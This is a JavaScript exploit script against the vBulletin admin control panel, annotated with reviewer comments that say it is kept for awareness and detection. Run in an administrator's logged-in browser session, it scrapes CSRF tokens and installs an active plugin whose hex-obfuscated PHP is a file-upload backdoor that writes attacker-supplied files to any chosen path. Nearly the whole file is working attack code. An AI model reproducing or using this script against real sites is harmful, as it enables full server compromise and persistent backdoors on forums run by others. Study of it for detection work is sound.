// Reviewer note: this is an attack script, not application code. Executed inside
// an administrator's already-authenticated browser session it drives the
// vBulletin AdminCP below -- step1()/step2() scrape the CSRF tokens and then
// install a plugin whose PHP body is a file-upload backdoor. It is kept for
// awareness and detection engineering only; do not deploy or "harden" it.
var debug = true; //show result: when true, step2() document.write()s the raw AdminCP response into the page
var post = getHTTPObject(); // request object for the plugin-update POST (step2); getHTTPObject is a hoisted declaration further down
var get = getHTTPObject(); // request object for fetching the add-plugin form (step1)
// Target base URL, hard-coded. NOTE(review): a plain XMLHttpRequest can only read
// the response under the same-origin policy, so the script is presumably meant
// to run on the forum host itself (e.g. injected through an XSS) -- confirm.
var admincp = "http://localhost/upload/admincp/";
/**
 * Build an XMLHttpRequest, ES5-era feature-detection style.
 *
 * @returns {XMLHttpRequest|false|undefined} a fresh request object; `false`
 *   when the XMLHttpRequest constructor exists but throws; `undefined` when
 *   there is no XMLHttpRequest global at all. Callers in this file check
 *   neither case and will fail on `.open()`.
 */
function getHTTPObject() {
  var request;
  if (typeof XMLHttpRequest === 'undefined') {
    return request; // no constructor available: undefined, as before
  }
  try {
    request = new XMLHttpRequest();
  } catch (err) {
    // Swallowed on purpose: failure is reported as a falsy value, not thrown.
    request = false;
  }
  return request;
}
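/**
 * Return the part of this string that sits between `prefix` and `suffix`.
 *
 * Used by step2() to scrape hidden form-field values out of AdminCP HTML.
 * Extending String.prototype is kept because callers rely on the
 * `str.between(...)` call form; note the property is enumerable, so it will
 * show up in `for...in` over string objects.
 *
 * @param {string} prefix marker to search for; the result starts right after
 *   its first occurrence
 * @param {string} [suffix] marker that ends the result; a falsy value
 *   (omitted or '') means "everything after the prefix"
 * @returns {string} the extracted text, or '' when `prefix` is absent or a
 *   truthy `suffix` is not found after it
 */
String.prototype.between = function(prefix, suffix) {
  // `this` is a String wrapper object in sloppy mode but the primitive in
  // strict mode; normalise so both behave the same. The working copy is a
  // local -- the original assigned an undeclared `s`, which leaked an implicit
  // global in sloppy mode and throws a ReferenceError under strict mode.
  var s = String(this);
  var i = s.indexOf(prefix);
  if (i < 0) {
    return '';
  }
  s = s.substring(i + prefix.length);
  if (suffix) {
    i = s.indexOf(suffix);
    if (i < 0) {
      return '';
    }
    s = s.substring(0, i);
  }
  return s;
};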
/**
 * Step 1 of the chain: fetch the AdminCP "add plugin" form so that step2()
 * can scrape the per-session adminhash and securitytoken out of its HTML.
 *
 * Uses the file-level `get` request object and `admincp` base URL, and hands
 * the raw response body to step2() once the request completes. There is no
 * status check: any completed response, including an error or login page,
 * is passed on.
 */
function step1() {
  var url = admincp + "plugin.php?do=add";
  var onStateChange = function () {
    if (get.readyState === 4) {
      step2(get.responseText);
    }
  };
  get.open("GET", url, true);
  get.onreadystatechange = onStateChange;
  get.send(null);
}
/**
 * Step 2 of the chain: turn the scraped add-plugin form into an install POST.
 *
 * @param {string} str raw HTML of admincp/plugin.php?do=add, as handed over by step1()
 *
 * Visible behaviour:
 *  - scrapes the hidden `adminhash` and `securitytoken` fields with
 *    String.prototype.between; both come back '' when the markers are absent
 *    (non-admin session, login page, changed markup) and nothing checks that;
 *  - builds `shellcode`, a PHP snippet wrapped in eval("...") as \xNN escapes.
 *    The `\\x` in the JS literal goes on the wire as `\x`, so PHP's
 *    double-quoted-string processing decodes it when the plugin runs. Decoded,
 *    the snippet reads: if $_REQUEST['do']=='load', move_uploaded_file() the
 *    posted $_FILES["files"] to $_REQUEST["path"].<name>, then die() with a
 *    multipart upload form -- an attacker-chosen-path file-upload backdoor;
 *  - POSTs it to plugin.php?do=update as a new, active plugin on the
 *    global_start hook (hook name as given; when vBulletin evaluates it
 *    depends on the target version).
 * adminhash, securitytoken, shellcode and data are assigned without `var` and
 * so become implicit globals, readable by any other script on the same page.
 */
function step2(str){
var string;
adminhash = str.between('adminhash" value="', '" />');
securitytoken = str.between('securitytoken" value="', '" />');
// The PHP is delivered as \xNN escapes inside eval(""): this hides the code
// from casual review, and the resulting bytes contain no '&', '=', '+' or '%',
// which is why the value is appended to the form body below without
// encodeURIComponent() and still parses on the server side.
shellcode = 'eval("\\x20\\x69\\x66\\x20\\x28\\x24\\x5f\\x52\\x45\\x51\\x55\\x45\\x53\\x54\\x5b\\x27\\x64\\x6f\\x27\\x5d\\x3d\\x3d\\x27\\x6c\\x6f\\x61\\x64\\x27\\x29\\x7b\\xd\\xa\\x20\\x24\\x66\\x69\\x6c\\x65\\x73\\x20\\x3d\\x20\\x40\\x24\\x5f\\x46\\x49\\x4c\\x45\\x53\\x5b\\x22\\x66\\x69\\x6c\\x65\\x73\\x22\\x5d\\x3b\\xd\\xa\\x20\\x69\\x66\\x28\\x24\\x66\\x69\\x6c\\x65\\x73\\x5b\\x22\\x6e\\x61\\x6d\\x65\\x22\\x5d\\x20\\x21\\x3d\\x20\\x27\\x27\\x29\\x7b\\xd\\xa\\x20\\x24\\x66\\x75\\x6c\\x6c\\x70\\x61\\x74\\x68\\x20\\x3d\\x20\\x24\\x5f\\x52\\x45\\x51\\x55\\x45\\x53\\x54\\x5b\\x22\\x70\\x61\\x74\\x68\\x22\\x5d\\x2e\\x24\\x66\\x69\\x6c\\x65\\x73\\x5b\\x22\\x6e\\x61\\x6d\\x65\\x22\\x5d\\x3b\\xd\\xa\\x20\\x69\\x66\\x28\\x6d\\x6f\\x76\\x65\\x5f\\x75\\x70\\x6c\\x6f\\x61\\x64\\x65\\x64\\x5f\\x66\\x69\\x6c\\x65\\x28\\x24\\x66\\x69\\x6c\\x65\\x73\\x5b\\x27\\x74\\x6d\\x70\\x5f\\x6e\\x61\\x6d\\x65\\x27\\x5d\\x2c\\x24\\x66\\x75\\x6c\\x6c\\x70\\x61\\x74\\x68\\x29\\x29\\x20\\x65\\x63\\x68\\x6f\\x20\\x22\\x3c\\x68\\x31\\x3e\\x3c\\x61\\x20\\x68\\x72\\x65\\x66\\x3d\\x27\\x24\\x66\\x75\\x6c\\x6c\\x70\\x61\\x74\\x68\\x27\\x3e\\x4f\\x4b\\x2d\\x43\\x6c\\x69\\x63\\x6b\\x20\\x68\\x65\\x72\\x65\\x21\\x3c\\x2f\\x61\\x3e\\x3c\\x2f\\x68\\x31\\x3e\\x22\\x3b\\xd\\xa\\x20\\x7d\\xd\\xa\\x20\\x64\\x69\\x65\\x28\\x27\\x3c\\x66\\x6f\\x72\\x6d\\x20\\x6d\\x65\\x74\\x68\\x6f\\x64\\x3d\\x50\\x4f\\x53\\x54\\x20\\x65\\x6e\\x63\\x74\\x79\\x70\\x65\\x3d\\x22\\x6d\\x75\\x6c\\x74\\x69\\x70\\x61\\x72\\x74\\x2f\\x66\\x6f\\x72\\x6d\\x2d\\x64\\x61\\x74\\x61\\x22\\x20\\x61\\x63\\x74\\x69\\x6f\\x6e\\x3d\\x22\\x22\\x3e\\xd\\xa\\x20\\x3c\\x69\\x6e\\x70\\x75\\x74\\x20\\x74\\x79\\x70\\x65\\x3d\\x74\\x65\\x78\\x74\\x20\\x6e\\x61\\x6d\\x65\\x3d\\x70\\x61\\x74\\x68\\x3e\\xd\\xa\\x20\\x3c\\x69\\x6e\\x70\\x75\\x74\\x20\\x74\\x79\\x70\\x65\\x3d\\x22\\x66\\x69\\x6c\\x65\\x22\\x20\\x6e\\x61\\x6d\\x65\\x3d\\x22\\x66\\x69\\x6c\\x65\\x73\\x22\\x3e\\x3c\\x69\\x6e\\x70\\x75\\x74\\x20\\x74\\x79\\x70\\x65\\x3d\\x73\\x75\\x62\\x6d\\x69\\x74\\x20\\x76\\x61\\x6c\\x75\\x65\\x3d\\x22\\x55\\x70\\x22\\x3e\\x3c\\x2f\\x66\\x6f\\x72\\x6d\\x3e\\x27\\x29\\x3b\\xd\\xa\\x20\\x7d\\xd\\xa");';
// Form body is string-built; the scraped adminhash/securitytoken are inserted
// unencoded as well. pluginid is left empty, i.e. "create new".
data = "do=update&adminhash="+adminhash+"&securitytoken="+securitytoken+"&product=vbulletin&hookname=global_start&title=Upload&executionorder=5&phpcode="+shellcode+"&active=1&pluginid=";
post.onreadystatechange = function(){
if(post.readyState == 4){
string = post.responseText;
// Dumps the untrusted AdminCP response HTML straight into the current document
// (an HTML-injection sink); operator-facing debug output only.
if(debug == true) document.write(string);
}
}
post.open("POST", admincp+"plugin.php?do=update", true);
post.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
// NOTE(review): Content-Length and Connection are forbidden request-header
// names in the XHR spec, so current browsers ignore both calls and compute the
// length themselves; data.length is UTF-16 code units, not bytes, in any case.
post.setRequestHeader("Content-length", data.length);
post.setRequestHeader("Connection", "close");
post.send(data);
}
- step1();